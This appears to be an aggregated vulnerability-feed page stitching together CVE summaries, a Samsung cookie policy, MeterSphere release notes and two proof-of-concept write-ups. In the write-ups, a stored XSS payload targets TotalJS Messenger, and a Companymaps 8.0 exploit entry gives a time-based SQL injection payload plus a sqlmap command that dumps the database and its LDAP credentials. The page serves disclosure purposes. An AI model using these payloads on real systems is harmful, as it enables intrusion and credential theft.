Out-of-bounds Read vulnerability while processing CMD_COLDWALLET_BTC_SET_PRV_UTXO in bc_core trustlet from Samsung Blockchain Keystore prior to version 1.3.12.1 allows local attacker to read arbitrary memory.

This Cookie Policy describes the different types of cookies that may be used in connection with Samsung Mobile Security website which is owned and controlled by Samsung Electronics Co., Ltd (“Samsung Electronics”). This Cookie Policy also describes how you can manage cookies.

It’s important that you check back often for updates to the Policy as we may change it from time to time to reflect changes to our use of cookies. Please check the date at the top of this page to see when this Policy was last revised. Any changes to this Policy will become effective when we make the revised Policy available on our website.

Samsung Electronics has offices across Europe, so we can ensure that your request or query will be handled by the data protection team based in your region. If you have any questions, the easiest way to contact us is through our Privacy Support Page at https://www.samsung.com/request-desk.

You can also contact us at:

European Data Protection Officer  
Samsung Electronics (UK) Limited  
Samsung House, 2000 Hillswood Drive, Chertsey, Surrey KT16 0RS

**Cookies**

Cookies are small files that store information on your computer, TV, mobile phone, or other device. They enable the entity that put the cookie on your device to recognize you across different websites, services, devices, and/or browsing sessions.

We use the following types of cookies on this website:

**Essential Cookies**: enable you to receive the services you request via our website. Without these cookies, services that you have asked for cannot be provided. For example, these enable to identify users and provide proper service for each user. These cookies are automatically enabled and cannot be turned off because they are essential to enable you to browse our website. Without these cookies this Samsung Mobile Security website could not be provided.

Cookie

Domain

Purpose

JSESSIONID

security.samsungmobile.com

to keep login session

lastActivityTime

security.samsungmobile.com

to save the user's last activity time to automatically logout after 30 minutes of inactivity

**Managing Cookies and Other Technologies**

You can also update your browser settings at any time, if you want to remove or block cookies from your device (consult your browser's "help" menu to learn how to remove or block cookies). Samsung Electronics is not responsible for your browser settings. You can find good and simple instructions on how to manage cookies on the different types of web browsers at http://www.allaboutcookies.org.

CVE-2023-21511: Samsung Mobile Security

Improper access control vulnerability in AppLock prior to SMR May-2023 Release 1 allows local attackers without proper permission to execute a privileged operation.

CVE-2023-21484: Samsung Mobile Security

A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the private task field.

****CVE-2023-30097****

Author: Edoardo Ottavianelli  
04/05/2023

In this post I will go through CVE-2023-30097: the description, replication of the vulnerability and POC.

Messenger, a product of TotalJS, is "a chat application for programmers. Our solution is a small, fast, and open-source web application that you can customize to fit your needs. Try our great solution as a communication channel in your company or sell it to your customers."

The Messenger platform includes:

*   Real-time messaging.
*   Supports GitHub flavored markdown.
*   Supports secret messages.
*   Full-text search.

**Description of the vulnerability**

TotalJS messenger commit b6cf1c9 is vulnerable to XSS. The private task field is not properly sanitized.

**Replication of the vulnerability**

*   Login in the application.
*   Click on Add a Private task.
*   Set **" <script>alert(document.domain)</script>** as task description and save.
*   XSS will fire whenever user info is reflected in page.

**POC**

See the Youtube Video POC here:

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-30097
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30097
*   https://www.youtube.com/watch?v=VAlbkvOm\_DU
*   https://github.com/totaljs/messenger/issues/9

CVE-2023-30097: Edoardo Ottavianelli

A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the channel description field.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-30095: [Security] Stored XSS in channel description · Issue #11 · totaljs/messenger

A stored cross-site scripting (XSS) vulnerability in TotalJS messenger commit b6cf1c9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user information field.

CVE-2023-30096: [Security] Stored XSS in user fields · Issue #10 · totaljs/messenger

A stored cross-site scripting (XSS) vulnerability in TotalJS Flow v10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the platform name field in the settings module.

CVE-2023-30094: [Security] Stored XSS in platform name · Issue #100 · totaljs/flow

CVE-2023-30094

MeterSphere is an open source continuous testing platform, covering functions such as test tracking, interface testing, UI testing, and performance testing. This IDOR vulnerability allows the administrator of a project to modify other projects under the workspace. An attacker can obtain some operating permissions. The issue has been fixed in version 2.9.0.

**一、安装和升级****1.1 在线方式**

仅需两步快速安装 MeterSphere:

1.  准备一台不小于 8 G内存且可以访问互联网的 64位 Linux 主机；
2.  以 root 用户执行如下命令一键安装 MeterSphere。

curl -sSL https://resource.fit2cloud.com/metersphere/metersphere/releases/latest/download/quick\_start.sh | bash

如果你使用了 Kubernetes 及 Helm，还可以通过我们的 Helm Chart 进行部署。

**一键升级**

如果您已经部署了 MeterSphere 的 v2.3 及以上版本，可通过如下命令一键升级至最新版本

**1.2 离线方式**

离线安装包下载地址

详细安装和升级文档请参考: 完整文档

**二、更新日志****2.1 新增功能**

无

**2.2 功能优化**

*   refactor(测试跟踪): 批量导出功能用例性能优化
*   refactor(测试跟踪): 测试计划关联用例性能优化
*   refactor(测试跟踪): 用例评审列表增加标签列
*   refactor(测试跟踪): 高级搜索支持输入多个标签搜索
*   refactor(接口测试): 接口导入逻辑优化
*   refactor(接口测试): 接口CASE支持通过路径快捷搜索
*   refactor(接口测试): 接口场景列表展示定时任务列
*   refactor(接口测试): 接口自动化文档结构断言增加复选框操作
*   refactor(UI 测试): UI场景列表展示定时任务列
*   refactor(通用功能): 首次登录系统加载耗时优化

**2.3 Bug修复**

*   fix(测试跟踪): 修复测试计划失败重试时导致计划中接口脚本的循环没有被执行完全的问题（GitHub #23509）
*   fix(测试跟踪): 修复测试计划执行时自定义字段文本框输入{}会显示为\[object Object\]的问题（GitHub #23515）
*   fix(测试跟踪): 修复从1.20LTS版本升级到最新版本用例执行上传的截图和评论查询不到的问题（GitHub #23500）
*   fix(接口测试): 修复JMeter不填写路径导出的jmx文件导入到ms内添加路径无法测试的问题（GitHub #23416）
*   fix(接口测试): 修复CASE 执行完请求后，手动修改预览响应体为 json，再次执行预览格式有误的问题（GitHub #23350）
*   fix(接口测试): 修复接口用例执行完成，通过率数据不会自动更新的问题（GitHub #23386）

CVE-2023-30550: Release v2.9.0 · metersphere/metersphere

Companymaps version 8.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Unauthenticated SQL injection  
- Google Dork:  
- Date: 27.04.2023  
- Exploit Author: Lucas Noki (0xPrototype)  
- Vendor Homepage: https://github.com/vogtmh  
- Software Link: https://github.com/vogtmh/cmaps  
- Version: 8.0  
- Tested on: Mac, Windows, Linux  
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:  
```html  
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />  
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:   
```  
'-(select*from(select+sleep(2)+from+dual)a)--+  
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.  
   ```shell  
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump  
   ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

Companymaps 8.0 SQL Injection

Red Hat Security Advisory 2023-2097-03 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, deserialization, improper neutralization, information leakage, and remote shell upload vulnerabilities.

Tag

#js